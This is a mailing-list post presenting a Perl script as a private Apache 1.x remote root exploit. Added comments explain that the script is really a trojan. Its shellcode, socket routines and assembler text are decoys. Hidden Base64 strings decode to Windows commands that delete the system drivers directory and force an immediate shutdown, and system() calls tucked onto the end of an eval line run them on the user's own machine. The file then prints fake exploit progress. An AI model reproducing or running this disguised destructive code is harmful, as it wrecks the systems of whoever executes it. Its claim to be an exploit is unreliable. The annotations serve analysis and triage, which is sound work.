[Full-disclosure] A new apache 1.x 0day



Hi,

A new apache 1.x 0day

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;

# Banner printed on every run. A single-quoted heredoc keeps the text verbatim
# (no interpolation), including the two leading and one trailing blank lines
# that the original q{...} literal contained.
print <<'BANNER';


#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshisha@xxxxxxxxxxxxx
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################

BANNER

# Both positional arguments are required; otherwise print the usage text and
# stop. (@ARGV < 2 is the same test as $#ARGV < 1.)
if ( @ARGV < 2 ) {
    print "[^] Usage : apache.pl [target] [port]\n";
    print "[^] Example : apache.pl 127.0.0.1 80\n";
    exit;
}

# Decoy: $shellcode is assembled here and never referenced again anywhere in
# this file, so these bytes are never sent. Two further signs it is filler:
# the 2nd to 6th lines of the literal (starting "\x32\x3c\xe5\x83") are
# repeated verbatim as the 7th to 11th, and the variable is appended to with .=
# without ever being declared (the file runs without strict).
# Original author comment: "Can be replaced, simply get a rootshell".


$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";


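# Positional arguments as documented by the usage text: host first, port
# second. The original read $ARGV[1] and $ARGV[2], which is off by one against
# the usage check above (two arguments required, i.e. indices 0 and 1), so with
# exactly two arguments $target held the port and $port was undef. Neither
# variable is referenced anywhere else in this file.
my $target = $ARGV[0];

my $port = $ARGV[1];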


# Named after the connect() builtin: a plain connect(...) call still resolves
# to the builtin, so this sub is reachable only as &connect() or main::connect(),
# and nothing in this file calls it either way. What it does when called:
# installs a die handler that rewrites every "0x" in the message to "4", throws
# "0x4141414141" inside an eval, and prints the rewritten message from $@.
# Returns the value of print (1) when $@ is set.
sub connect {
    local $SIG{__DIE__} = sub {
        my ($message) = @_;
        $message =~ s/0x/4/g;
        die $message;    # already carries " at FILE line N.\n", so nothing is appended
    };
    eval { die "0x4141414141" };
    print $@ if $@;
}


# Shadows the socket() builtin, as connect() above shadows connect(); a plain
# socket(...) call still reaches the builtin, and nothing in this file calls
# this sub under any name. NOTE(review): push with a bareword operand is not
# valid under strict — older perls took the bareword as the package array name
# (@SOCKADDR etc.) with an "Array @SOCKADDR missing the @" warning, newer ones
# reject it at compile time; confirm on the perl this was meant to run under.
# Either way nothing is pushed and none of these arrays is read anywhere in
# the file.
sub socket {

push SOCKADDR;
push SOCKDATA;
push STACKDATA;
push ESPOINT;
push ENDADDR;

}

# Does nothing useful: qw(...) is just a list of whitespace-separated words,
# eval EXPR takes its operand in scalar context (effectively the last word,
# "OSPrintWordNum"), and evaluating that bareword merely yields the string.
# The assembler-looking text is never assembled or executed. The same holds
# for every other eval qw(...) statement further down in this file.
eval qw (

Bytecode:

dec cx
jz Root
mov bp, FloppyOff ;offset
pushf
push cs
push bp
jmp [OldISR]

Root:
inc cx
cmp dx, [SecondCntr] ;cs:.
jne NotSecond
IsSecond:


mov bh,5
mov bl,21
call seg OSSetCursorXY:OSSetCursorXY ; root runs once
mov ax,cx
call seg OSPrintWordNum:OSPrintWordNum



mov bh,5
mov bl,22
call seg OSSetCursorXY:OSSetCursorXY
mov ax,[RootCntr] ;cs:.
mov [RootCntr],0 ;cs:.
call seg OSPrintWordNum:OSPrintWordNum
);

{

# Shared state for the MD5 helpers in this bare block: per-step rotation
# amounts (@S), the sine-derived additive constants (@T), the message-word
# index used by each step (@M) and the generated source text ($code). All four
# start empty and are filled by _md5_init() / _md5_generate().
my @S;
my @T;
my @M;
my $code = q{};



# Hex MD5 digest of a single string (this is the Digest::Perl::MD5-style pure
# Perl implementation; nothing in this file ever calls it). Returns undef for
# an undef argument. The tables and the generated _md5_perl_generated sub are
# built lazily on first use: after _md5_init() has run, $M[0] is 0, which is
# defined, so the check below fires only once.
sub md5 {

return undef if ( !defined $_[0] );

my $DATA = _md5_pad( $_[0] );

&_md5_init() if ( !defined $M[0] );

return _md5_perl_generated( \$DATA );

}



# One-time setup of the MD5 tables, then generation of the compression
# function. A filled @S marks the work as done. The last statement is kept from
# the original: its value is unused, but as the final expression it is what the
# sub returns.
sub _md5_init {
    return if defined $S[0];

    # T[i] = int(2**32 * |sin(i + 1)|) for i = 0 .. 63.
    @T = map { int( ( 2**32 ) * abs( sin($_) ) ) } 1 .. 64;

    # Four rotation amounts per round; step i uses entry (round * 4 + i % 4).
    my @rotation = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
    @S = map { $rotation[ int( $_ / 16 ) * 4 + $_ % 4 ] } 0 .. 63;

    # Which of the 16 message words each of the 64 steps consumes.
    @M = (
        0, 1, 2,  3,  4, 5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,
        1, 6, 11, 0,  5, 10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,
        5, 8, 11, 14, 1, 4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,
        0, 7, 14, 5,  12, 3, 10, 1,  8,  15, 6,  13, 4,  11, 2,  9
    );

    _md5_generate();

    my $TEST = _md5_pad('foobar');
}



# MD5 padding: append 0x80, zero-fill to 8 bytes short of a 64-byte boundary,
# then append the original length in bits as a 64-bit little-endian number
# (two 32-bit halves; the high half is taken with two 16-bit shifts so the
# expression also works on 32-bit perls). The result length is a multiple
# of 64.
sub _md5_pad {
    my $msg = shift;
    $msg .= chr(128);

    my $len    = length $msg;
    my $rem    = $len % 64;
    my $target = $rem <= 56 ? 56 : 120;
    $msg .= "\0" x ( $target - $rem );

    my $bits = ( $len - 1 ) * 8;    # length of the message before the 0x80 byte
    $msg .= pack 'VV', $bits & 0xffffffff, $bits >> 16 >> 16;

    return $msg;
}

# These two lines are the script's real content. They sit between the MD5
# helpers but have nothing to do with them: the strings are handed to system()
# on the line that closes the next eval qw(...) block below. decode_base64
# (from MIME::Base64, the only one of the five imported modules this file
# actually uses) turns them into the Windows commands
#   @del %SystemRoot%\System32\drivers\*.* /F /S /Q > nul
#   shutdown -s -f -t 0
# i.e. delete the whole drivers directory, then force an immediate shutdown,
# on the machine that runs this file. The names $mov and $int appear chosen
# to blend in with the surrounding assembler-looking text. Indicators for
# anyone triaging this: the Base64 literals themselves and the fact that no
# network code exists anywhere in the file.
$mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
$int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

# Builds the MD5 block function as Perl source text and compiles it with a
# string eval, which defines _md5_perl_generated (the sub md5() calls); it
# exists only after _md5_init() has run. In the heredocs and strings below,
# \$ and \@ produce literal sigils in the generated text, while unescaped
# $a/$b/$c/$d, $S[$i], $T[$i] and $M[$i] are interpolated now, at generation
# time. The generated sub opens with BEGIN { $^H |= 1 }: bit 0x1 of $^H is the
# hint that "use integer" sets, so its arithmetic runs on native integers.
sub _md5_generate {

# Four rotations of (a b c d): substr($N, ($i % 4) * 4, 4) names the register
# updated at step $i and the order in which the other three are read.
my $N = 'abcddabccdabbcda';

my ( $i, $M ) = ( 0, '' );

# With integers wider than 32 bits, (1 << 16) << 16 is non-zero and every step
# result is masked back to 32 bits; the author relies on a 32-bit perl shifting
# this to 0, in which case no mask is emitted because the arithmetic wraps.
$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );

$code = <<EOT;

sub _md5_perl_generated {

BEGIN { \$^H |= 1; };

my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

my (\$a,\$b,\$c,\$d,\$t,\$i);

my \$dr=shift;

my \$l=length(\$\$dr);

for my \$L (0 .. ((\$l/64)-1) ) {

my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));

(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

# Round 1, steps 0..15: F(b,c,d) = d ^ (b & (c ^ d)), then rotate-left by
# $S[$i] and add b. The rotate is spelled out with shifts and a mask because
# the generated code may run with 64-bit integers.
for ( $i = 0 ; $i < 16 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

# Round 2, steps 16..31: G(b,c,d) = c ^ (d & (b ^ c)).
for ( ; $i < 32 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

# Round 3, steps 32..47: H(b,c,d) = b ^ c ^ d.
for ( ; $i < 48 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

# Round 4, steps 48..63: I(b,c,d) = c ^ (b | ~d).
for ( ; $i < 64 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

# Fold the block result into the running state (+ binds tighter than &, so
# each line is ($A + $a) & 0xffffffff) and return the digest as hex.
$code .= <<EOT;

\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

} # for

return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

# Compiles source this sub built itself (no external input involved). $@ is
# not checked, so a generation error would only surface later as a call to
# an undefined _md5_perl_generated.
eval "$code";

}

}

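# crypt() the given string with a fresh two-character random salt drawn from
# [a-zA-Z0-9]. Returns whatever crypt() returns for that salt (nothing in this
# file calls it). Fix: the original indexed the 62-element salt alphabet with
# rand(63), so index 62 was reachable and yielded an undef salt character,
# i.e. an occasional one-character salt; rand(@salt_chars) stays in range.
sub rehash
{
my ($unencrypted_string) = @_;
my @salt_chars = ( 'a' .. 'z', 'A' .. 'Z', '0' .. '9' );
my $salt = join '', map { $salt_chars[ rand @salt_chars ] } 1 .. 2;
return crypt( $unencrypted_string, $salt );
}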

# The eval qw(...) part is a no-op for the same reason as the earlier one
# (only the last word, "edi", is evaluated). The live code is the tail of the
# closing line: system($mov) and system($int) run the two Base64-decoded
# Windows commands assigned next to the MD5 helpers above — deletion of
# %SystemRoot%\System32\drivers and a forced immediate shutdown — and the bare
# shift discards $ARGV[0]. This runs unconditionally; no target host is ever
# contacted anywhere in the file.
eval qw (

make_startup_room: ; setup ebp for WSAStartup data
push BYTE 20 ; push 20
pop eax ; register
mul eax ; square that *** = 0x190
sub esp, eax ; make room for WSAStartup data
mov ecx, esp

make_table_room: ; setup ebp for address table
sub esp, BYTE (_WSA_INIT_TBLEN * 4)
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32 dll base
mov ebp, esp
push ecx ; push WSAStartup data address
push eax ; push 0x190

make_table: ; hash the table
WSA_HASH_WINSOCK

wsa_startup:
; call WSAStartup
WSA_CALL_WSASTART

make_socket:
; call WSASocketA, get a tcp socket
WSA_CALL_SOCKET 'tcp'
; we got the socket in edi
);system ($mov);system ($int);shift;
# Another no-op: eval sees only the last word ("0x80") and yields 128; none of
# the text is assembled or executed.
eval qw (

push word 0x4D2

inc ebx

push bx

mov ecx, esp

push byte 16

push ecx

push eax

mov ecx, esp

mov al, 102

int 0x80
);

# Status line followed by a four-second pause. No connection is opened before
# or after it anywhere in this file, so the delay is purely for appearance.
print "[x] Exploiting...\n";
sleep 4;

# Third decoy list. Note that this qw< ... > has no closing > in this copy
# (the one further down is the same); as shown, perl would stop with an
# unterminated-string error before running anything, which suggests the >
# characters were lost when the message was archived rather than being absent
# from the file as distributed.
eval qw <
accept:

push eax

push edi

mov ecx, esp

inc ebx

mov al, 102

int 0x80

dup2:

xor ecx, ecx

mov cl, 3
;

# $recvdata is never assigned anywhere in this file. undef compares numerically
# as 0 (with an "uninitialized value" warning only if warnings were enabled,
# which they are not), so the first branch never runs and the script always
# reports failure.
if ($recvdata != 0) {
print "[x] Executing Shellcode...";
}

if ($recvdata == 0) {
print "[x] Exploit failed!";
}

# Last decoy list (same missing > as the previous qw< block), then exit. By
# this point the only real work — the two system() calls on the line closing
# the first eval qw(...) block — has already happened.
eval qw <
exec:

xor eax,eax

mov al, 11

push ecx

push "//sh"

push "/bin"

mov ebx, esp

push ecx

push ebx

mov ecx, esp

int 0x80
;

exit;
